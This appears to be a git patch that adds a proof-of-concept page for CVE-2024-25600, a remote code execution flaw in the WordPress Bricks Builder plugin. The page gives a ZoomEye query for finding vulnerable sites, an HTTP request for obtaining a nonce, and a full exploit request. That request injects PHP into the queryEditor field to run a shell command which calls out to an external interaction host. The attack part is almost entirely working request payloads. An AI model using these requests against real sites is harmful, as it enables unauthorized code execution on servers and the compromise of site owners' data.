From e2ddd75bec6cb2dd4062ec8d49b9124f2764507e Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 9 Mar 2024 15:17:48 +0800 Subject: [PATCH] =?UTF-8?q?Create=20WordPress=E6=8F=92=E4=BB=B6Bricks=20Bu?= =?UTF-8?q?ilder=E5=AD=98=E5=9C=A8RCE=E6=BC=8F=E6=B4=9E(CVE-2024-25600).md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...Bricks Builder存在RCE漏洞(CVE-2024-25600).md | 46 +++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 WordPress插件Bricks Builder存在RCE漏洞(CVE-2024-25600).md diff --git a/WordPress插件Bricks Builder存在RCE漏洞(CVE-2024-25600).md b/WordPress插件Bricks Builder存在RCE漏洞(CVE-2024-25600).md new file mode 100644 index 0000000..89520ed --- /dev/null +++ b/WordPress插件Bricks Builder存在RCE漏洞(CVE-2024-25600).md @@ -0,0 +1,46 @@ +## WordPress插件Bricks Builder存在RCE漏洞(CVE-2024-25600) + +## zoomeye +``` +web.body="/wp-content/themes/bricks/" +``` + +## poc + +### 获取nonce值 +``` +GET / HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:96.0) Gecko/20100101 Firefox/96.0 +Connection: close +Accept-Encoding: gzip, deflate +``` +![f8692e900e34adeb6f8b23677258b8e1](https://github.com/wy876/POC/assets/139549762/656552ce-28a6-407a-b746-56bd36ea3eb0) + +### rce +``` +POST /wp-json/bricks/v1/render_element HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0 +Connection: close +Content-Length: 401 +Content-Type: application/json +Accept-Encoding: gzip, deflate + +{ + "postId": "1", + "nonce": "c5b5949**", + "element": { + "name": "container", + "settings": { + "hasLoop": "true", + "query": { + "useQueryEditor": true, + "queryEditor": "ob_start();echo `curl cnc4ej5blq62an78ck6giyhcffmdr5t56.oast.pro`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);", + "objectType": "post" + } + } + } +} +``` +![78880674cd49cefc6d5787c30efaf8cd](https://github.com/wy876/POC/assets/139549762/986bebf0-4369-462b-923c-775434318338)